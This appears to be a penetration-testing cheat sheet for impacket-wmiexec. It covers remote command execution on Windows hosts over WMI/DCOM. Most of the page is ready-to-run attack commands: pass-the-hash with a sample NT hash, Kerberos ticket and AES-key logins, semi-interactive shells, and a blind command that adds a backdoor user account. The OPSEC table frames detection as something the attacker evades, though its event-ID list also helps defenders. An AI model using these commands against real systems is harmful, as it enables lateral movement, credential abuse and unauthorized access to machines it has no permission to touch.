Skip to main content

Overview

impacket-wmiexec executes commands on a remote host using Windows Management Instrumentation (WMI) over DCOM (port 135 + dynamic high ports). It provides a semi-interactive shell without uploading any binary or creating a service. Output is retrieved by writing to a temp file on a writable share.

Authentication Methods

MethodFlagExample
Password(default)domain/user:password@target
NTLM hash-hashes-hashes :NT_HASH
Kerberos-k -no-pass-k -no-pass -dc-ip DC_IP
AES key-aesKey-aesKey AES256_KEY

Basic Usage — Interactive Shell

impacket-wmiexec domain.local/administrator:[email protected]
Local admin (no domain): 
impacket-wmiexec ./administrator:[email protected]

Execute Specific Command

impacket-wmiexec domain.local/administrator:[email protected] "whoami"
Run a PowerShell command: 
impacket-wmiexec domain.local/administrator:[email protected] "powershell -c Get-Process"

How It Works

  1. Authenticates to the target via DCOM/RPC (port 135).
  2. Negotiates a dynamic high port for WMI communication.
  3. Creates a Win32_Process via WMI to execute cmd.exe /Q /c <command>.
  4. Command output is redirected to a temp file at the root of the ADMIN$ share (e.g., C:\Windows\__<timestamp>, since ADMIN$ maps to C:\Windows) — not under \Temp.
  5. Reads the output file over SMB (port 445) and returns it to the attacker.
  6. Deletes the temp output file after reading.
The shell runs as the authenticated user (not SYSTEM, unless authenticating as SYSTEM-equivalent).

OPSEC Considerations

IndicatorDetail
Service creationNone — no service is installed
Binary on diskNone — no executable uploaded
Temp filesWrites output to ADMIN$ share (short-lived)
Event logsProcess creation (4688), WMI activity (5857, 5860, 5861)
DetectionStealthier than psexec — no service artifacts
Noise levelMedium — temp file writes and DCOM activity are detectable
Artifacts to expect:
  • Security Event ID 4624 (network logon type 3)
  • Security Event ID 4688 (process creation for cmd.exe)
  • WMI Operational Event IDs 5857, 5860, 5861
  • Temp files briefly written to the root of the share (default ADMIN$C:\Windows\__<timestamp>)

Pass-the-Hash

impacket-wmiexec -hashes :64f12cddaa88057e06a81b54e73b949b domain.local/[email protected]
With both LM and NT hash: 
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b domain.local/[email protected]

Kerberos Authentication

Requires a valid ccache file or keytab. 
export KRB5CCNAME=/tmp/administrator.ccache
impacket-wmiexec -k -no-pass domain.local/[email protected]
With explicit DC IP: 
impacket-wmiexec -k -no-pass -dc-ip 10.10.10.1 domain.local/[email protected] -target-ip 10.10.10.5
Using AES key directly: 
impacket-wmiexec -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc domain.local/[email protected] -k -no-pass

Specify Output Share

By default, output goes to ADMIN$. Use a different share: 
impacket-wmiexec -share C$ domain.local/administrator:[email protected]
Use a custom share (useful when ADMIN$ is restricted): 
impacket-wmiexec -share SHARE_NAME domain.local/administrator:[email protected]
Disable output file (blind execution, no output returned): 
impacket-wmiexec -nooutput domain.local/administrator:[email protected] "net user hacker P@ss123 /add"

Common Errors and Fixes

ErrorCauseFix
DCOM connection failedPort 135 or dynamic high ports blockedCheck firewall rules for RPC/DCOM
STATUS_ACCESS_DENIEDUser lacks WMI/DCOM permissionsVerify DCOM Launch and Access permissions
rpc_s_access_deniedRestricted RPC accessUser needs local admin or explicit WMI permissions
No output returnedADMIN$ share not accessibleTry -share C$ or another writable share
KDC_ERR_PREAUTH_FAILEDWrong password or expired ticketVerify creds, regenerate ccache
SessionError: STATUS_LOGON_FAILUREIncorrect credentialsDouble-check password/hash
Timeout / hangsDynamic RPC port negotiation blockedEnsure high ports (49152-65535) are reachable

Quick Reference

# Interactive shell with password
impacket-wmiexec domain.local/user:pass@TARGET

# Interactive shell with hash (pass-the-hash)
impacket-wmiexec -hashes :NTHASH domain.local/user@TARGET

# Interactive shell with Kerberos
export KRB5CCNAME=/tmp/user.ccache
impacket-wmiexec -k -no-pass domain.local/user@TARGET_FQDN

# Run single command
impacket-wmiexec domain.local/user:pass@TARGET "ipconfig /all"

# Blind execution (no output)
impacket-wmiexec -nooutput domain.local/user:pass@TARGET "cmd /c <command>"

# Use alternate output share
impacket-wmiexec -share C$ domain.local/user:pass@TARGET

# With explicit DC for Kerberos
impacket-wmiexec -k -no-pass -dc-ip DC_IP domain.local/user@TARGET_FQDN